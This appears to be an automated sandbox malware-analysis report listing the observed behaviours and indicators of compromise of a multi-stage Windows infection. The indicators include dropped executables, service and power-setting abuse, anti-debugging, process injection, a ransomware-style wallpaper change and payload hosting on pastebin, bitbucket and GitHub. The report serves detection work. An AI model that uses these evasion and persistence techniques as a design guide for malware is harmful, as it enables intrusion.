Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-1163522206-1469769407-485553996-1000\desktop.ini 23732637.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1163522206-1469769407-485553996-1000\desktop.ini 23732637.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
flow ioc 339 pastebin.com 1039 bitbucket.org 1231 pastebin.com 1232 pastebin.com 24 pastebin.com 379 iplogger.com 1036 bitbucket.org 1038 bitbucket.org 1037 bitbucket.org 12 raw.githubusercontent.com 13 raw.githubusercontent.com 23 pastebin.com 381 iplogger.com 1035 bitbucket.org -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 751 api.ipify.org 754 api.ipify.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3508 powercfg.exe 3712 powercfg.exe 3952 powercfg.exe 3932 powercfg.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File created C:\Windows\System32\WinBioDatabase\WerFault.exe intosvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 AA_v3.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\WinBioDatabase\ee201eac4591f0 intosvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 AA_v3.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
pid Process 2088 tasklist.exe 5636 tasklist.exe 4436 tasklist.exe 1844 tasklist.exe 276 tasklist.exe 2716 tasklist.exe 3580 tasklist.exe 5620 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\IPjaex13M.bmp" 23732637.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\IPjaex13M.bmp" 23732637.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 1120 5C82.tmp 5088 1Z45e8.exe 5000 skotes.exe 3272 2s3369.exe 4504 3P43S.exe 3388 DocumentsAKKEHIECFC.exe 4940 e3e353915c.exe 5236 6d85c101d5.exe 5504 97252a0aa2.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1236 set thread context of 2060 1236 Vhpcde.exe 61 PID 1648 set thread context of 2452 1648 88aext0k.exe 110 PID 3840 set thread context of 1644 3840 winupsecvmgr.exe 126 PID 3840 set thread context of 3844 3840 winupsecvmgr.exe 127 PID 4836 set thread context of 4548 4836 zxcv.exe 174 -
resource yara_rule behavioral1/files/0x0006000000015d0e-562.dat upx behavioral1/memory/3144-967-0x0000000000400000-0x0000000000428000-memory.dmp upx behavioral1/memory/3144-4205-0x0000000000400000-0x0000000000428000-memory.dmp upx behavioral1/memory/6072-11951-0x000007FEEA130000-0x000007FEEA718000-memory.dmp upx -
Drops file in Windows directory 38 IoCs
description ioc Process File created C:\Windows\sysclr.exe clr.exe File opened for modification C:\Windows\FirewireBros PkContent.exe File opened for modification C:\Windows\CheckingReliable NorthSperm.exe File opened for modification C:\Windows\instsrv.exe clr.exe File created C:\Windows\Tasks\skotes.job 1Z45e8.exe File opened for modification C:\Windows\PortugalCharges PkContent.exe File opened for modification C:\Windows\miter.exe cmd.exe File created C:\Windows\sysklnorbcv.exe t2.exe File opened for modification C:\Windows\ConferencesInto NorthSperm.exe File created C:\Windows\clrinst.bat clr.exe File opened for modification C:\Windows\clrinst.bat clr.exe File created C:\Windows\miterINST.exe clr.exe File opened for modification C:\Windows\sysvplervcs.exe s.exe File created C:\Windows\ModemLogs\9db6e019d4f04e intosvc.exe File opened for modification C:\Windows\AnchorAnnotated NorthSperm.exe File opened for modification C:\Windows\GamblingCedar NorthSperm.exe File created C:\Windows\__tmp_rar_sfx_access_check_259420926 clr.exe File created C:\Windows\sysclr.bat clr.exe File opened for modification C:\Windows\sysnldcvmr.exe 1138210337.exe File opened for modification C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\PorcelainExhaust PkContent.exe File opened for modification C:\Windows\sysppvrdnvs.exe tdrpload.exe File created C:\Windows\sysvplervcs.exe s.exe File opened for modification C:\Windows\MonsterRaymond PkContent.exe File opened for modification C:\Windows\miterINST.exe clr.exe File created C:\Windows\alark.exe clr.exe File opened for modification C:\Windows\alark.exe clr.exe File opened for modification C:\Windows\sysclr.exe clr.exe File created C:\Windows\miter.exe cmd.exe File created C:\Windows\sysnldcvmr.exe 1138210337.exe File created C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\ReceptorsTeeth PkContent.exe File created C:\Windows\sysppvrdnvs.exe tdrpload.exe File created C:\Windows\instsrv.exe clr.exe File opened for modification C:\Windows\sysklnorbcv.exe t2.exe File created C:\Windows\ModemLogs\iexplore.exe intosvc.exe File opened for modification C:\Windows\PgJune PkContent.exe File opened for modification C:\Windows\sysclr.bat clr.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4312 sc.exe 3076 sc.exe 5036 sc.exe 3256 sc.exe 3292 sc.exe 2720 sc.exe 4268 sc.exe 1192 sc.exe 4232 sc.exe 5080 sc.exe 1820 sc.exe 3276 sc.exe 3304 sc.exe 480 sc.exe 4284 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 4180 mshta.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 4048 2396 WerFault.exe 70 2692 4836 WerFault.exe 164 5848 5504 WerFault.exe 488 6124 3016 WerFault.exe 520 888 2720 WerFault.exe 600 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language miter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PkContent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Thermal.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AA_v3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3e353915c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23732637.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysklnorbcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5C82.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N2P23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 97252a0aa2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language npp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zxcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3P43S.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language soft.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExtremeInjector.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmablsvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evetbeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language compiled.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4i221v.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1138210337.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zxcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6d85c101d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hashed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AA_v3.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 30 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5000 PING.EXE 3816 PING.EXE 4344 PING.EXE 4620 PING.EXE 3908 PING.EXE 4412 PING.EXE 3892 PING.EXE 2180 PING.EXE 5928 PING.EXE 3880 PING.EXE 4812 PING.EXE 6016 PING.EXE 2948 PING.EXE 2480 PING.EXE 3084 PING.EXE 1384 PING.EXE 3272 PING.EXE 4744 PING.EXE 4036 PING.EXE 4228 PING.EXE 5128 PING.EXE 4356 PING.EXE 3624 PING.EXE 3920 PING.EXE 3744 PING.EXE 5012 PING.EXE 4616 PING.EXE 4244 PING.EXE 4428 PING.EXE 2096 PING.EXE -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 hashed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString hashed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3P43S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3P43S.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2224 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 7 IoCs
pid Process 5044 taskkill.exe 3332 taskkill.exe 1732 taskkill.exe 3672 taskkill.exe 3808 taskkill.exe 3244 taskkill.exe 4764 taskkill.exe -
Modifies Control Panel 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop 23732637.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallpaperStyle = "10" 23732637.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437791589" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B2CCC9F1-A2E6-11EF-A9E4-DAA46D70BA31} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a907cc1344750743988d8bab481dbfbf0000000002000000000010660000000100002000000068612939ec54c629ac860f847fcecc594321469a022ff56fed9ff8d6d9e7d923000000000e8000000002000020000000f01874afccef749fd430aaaaf5445cfc7a714d04765cd2923dc3a4a547db6fbc90000000b531fb33b95877ff2125281c1b34ff54401870a0abe2151600f853b2ab5bbd70beb306d680be843e72cf63285fbd8cf4703feaa38215e31d39e9429e46f65b0127fe363f36202538920332ab13b412384f82306ac408b619d6386d4476c0966e738235095181edad17ece2b9ff9539a2df73816892a104b359ae39898f17b46eebf18d0fc2658cf836df440fee20584e40000000cad7c40fe75ddf63b0aeecd4d2405d70f4c7f7587b2d3fe1d66d4101054182fee17ba41f9b0d352a2eac7362e2fb5bcf6646008b991ae2faaa440314540286ad iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0010c18bf336db01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a907cc1344750743988d8bab481dbfbf00000000020000000000106600000001000020000000a064cbb1f135b9392b0a015f25d4e2beda7eba98f5954772baecff0754fce9b5000000000e800000000200002000000020d727c7ffe26988583472aea90577897fc3665fbc4eeb4fe4b6d32c5c9d1a602000000093ce6474d564fc7dd9d153562b7c7fbb124ce12e88bf239628e16feeb0f6904740000000e61d2b229f7a5dfd38cc301dcae74b67e43ce086fdc04e7227c8a1773b7162d8b3219ebd3d183b0265efa2cd2bfb91f33d792ce12ce9d2c0e6a60c26d3d736cd iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-9f-64-8b-3c-be AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{13BC7E9D-2599-4B47-A581-F511E685240F}\WpadDecisionReason = "1" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings AA_v3.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{13BC7E9D-2599-4B47-A581-F511E685240F}\WpadNetworkName = "Network 3" AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{13BC7E9D-2599-4B47-A581-F511E685240F}\WpadDecisionTime = 40103ebaf336db01 AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-9f-64-8b-3c-be\WpadDecisionTime = 40103ebaf336db01 AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin\hr3 = 3391db1ce114bf60f594c916e1bfe4b41e37418fcd528d2f29b2506f20e2c7e76b16f3046a165b1d08c14f5f811d2a4958e6c09e2147ca36a145edf6c3f0db24b25a626f336bb1a00d3501 AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 